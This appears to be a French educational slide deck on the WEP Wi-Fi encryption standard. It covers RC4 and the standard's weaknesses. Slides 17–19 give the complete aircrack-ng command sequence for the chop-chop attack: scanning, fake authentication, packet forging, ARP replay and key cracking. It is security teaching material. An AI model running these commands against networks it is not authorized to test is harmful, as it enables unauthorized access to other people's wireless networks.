haking wep

1 573 vues

Publié le

hacking wep : failles , vulnérabilités et menaces de la clé wep.

Publié dans : Internet
  • Soyez le premier à commenter

  • Soyez le premier à aimer ceci

haking wep

  1. 1. Clé WEP AFIFI FAISSAL
  2. 2. • Type de réseau – LAN (Local Area Network) – MAN (Metropolitan Area network) – WAN (Wide Area Network) • Qu’est ce qu’un réseau Wi-Fi? – Ondes radioélectriques – Standards 802.11
  3. 3. TCP/IP
  4. 4. WEP(Wired Equivalent Privacy) • Qu’est ce que le WEP? – Fait partie de la norme internationale IEEE 802.11 – Une solution de confidentialité équivalente à un réseau filaire – Employé dans un WLAN pour : » La confidentialité » L’authentification » L’intégrité
  5. 5. WEP(Wired Equivalent Privacy) • Il est défini comme : – assez for: pour les clés longue (brute force) – à synchronisation automatique: les paquets sont autonomes – efficace : rapides (chiffrement et déchiffrement) – normalement exportable : longueur de clé variable – optionnel : l’utilisation du WEP est optionnel
  6. 6. Le chiffrement WEP • Il repose sur l’algorithme à clé symétrique RC4 • Le chiffrement se décompose en plusieurs phases : – La création de la graine :IV+clé – La création du keystream – Le calcul ICV « Integrity Check Value » – La constitution du message final et son encapsulation dans une trame
  7. 7. L’algorithme RC4 dans WEP RC4 – Symétrique – Chiffrement par flux – Différentes tailles de clé jusqu’à 256 bit – Il est extrêmement rapide Fonctionement • On génère un flux de données de taille identique au flux de données claires et on fait un XOR entre les deux
  8. 8. Initialisation de la clé • Deux longueurs de clé WEP – Clé (40 bits, soit 5 octets ) + IV = 64 bits – Clé (104 bits, soit 13 octets) + IV = 128 bits Graine IV : vecteur d’initialisation est une séquence de bits qui change régulièrement
  9. 9. Table «S» initialisée Mélange du tableau KSA pour i de 0 à 255 faire T[i]=i fin pour y ← 0 pour x de 0 à 255 faire y ← y + T[x] + S[x] (modulo 256) T[x] ↔ T[y] fin pour
  10. 10. Pseudo Random Generator Algorithm PRGA PRGA(T) : x ← 0 y ← 0 x ← x+1 y ← y+T[x] T[x] ↔ T[y] z ← T[x] + T[y] (modulo 256) renvoie T[z] Obtention du keystream =>
  11. 11. Opérations de chiffrement et de déchiffrement
  12. 12. LES FAILLES DU WEP • Social-Engineering • cryptanalyse
  13. 13. Les principales failles du WEP sont essentiellement les suivantes : • Les algorithmes de vérification d’intégrité et d’authentification sont très facilement contournables. • Possibilité de construire des dictionnaires fournissant en fonction d’un IV, le keystream. • L’algorithme de chiffrement RC4 présente des clés faibles et l’espace disponible pour les IV est trop petit. • • Une même clé est utilisée pour tout le réseau et les clés de chiffrement sont statiques . • Clés courtes 40 bits (5 caractères !!!) ou 104 bits et/ou trop simples (attaque par dictionnaire)
  14. 14. Les faiblesses du IV IV moins de 17 millions de combinaisons forte possibilité de Collisions Sniffer le réseau : ETHEREAL, WIRESHARK (la carte Wi-Fi en mode monitor)
  15. 15. Attaques contre le WEP L’attaque chop-chop • Le WEP utilise un contrôle de redondance cyclique ICV • Le CRC permet de s’assurer de l’intégrité des données mais en aucun cas de leur sécurité • L’attaque chop-chop va donc utiliser cette faiblesse pour injecter des paquets sur le réseau.
  16. 16. Trame1 Trame 2 ajout 1 octet de données _____ DATA ___ ___ICV ___ D0 D1 D2 D3 D4 I3 I2 I1 I0 + + + + + + + + + K0 K1 K2 K3 K4 K5 K6 K7 K8 = = = = = = = = = R0 R1 R2 R3 R4 R5 R6 R7 R8 _____ DATA ____ ___ICV ___ D0 D1 D2 D3 D4 D5 J3 J2 J1 J0 + + + + + + + + + + K0 K1 K2 K3 K4 K5 K6 K7 K8 K9 = = = = = = = = = = S0 S1 S2 S3 S4 S5 S6 S7 S8 S9 Il est possible de passer du paquet 2 au paquet 1 en devinant la valeur de la somme I3+D5 (1 chance sur 256). On note X = I3 + D5.
  17. 17. Suite L’attaque chop-chop scan des réseaux wifi airodump-ng -w out -c 10 --encrypt wep --bssid 00:16:41:C9:E0:3F wlan0 on se fait passer pour un client: fake authentification aireplay-ng wlan0 -1 30 -e nom_wifi -a 00:16:41:C9:E0:3F -h 00:12:F0:6F:ED:38
  18. 18. L'attaque Chopchop aireplay-ng -4 wlan0 -a 00:16:41:C9:E0:3F -h 00:12:F0:6F:ED:38 => resultat : 2 fichiers .cap et .xor Forger un paquet ARP avec Packetforge-ng packetforge-ng -0 -a 00:16:41:C9:E0:3F -h 00:12:F0:6F:ED:38 -k 192.168.1.1 -l 192.168.1.10 -y .xor -w arp.cap
  19. 19. L'injection: Aireplay-ng -3, arp replay #aireplay-ng -3 -e nom_wifi -a 00:16:41:C9:E0:3F -h 00:12:F0:6F:ED:38 -x600 -r arp.cap wlan0 Le crack de la clé wep avec Aircrack-ng #aircrack-ng out-01.cap
  20. 20. Attaques contre RC4
  21. 21. Implementation

×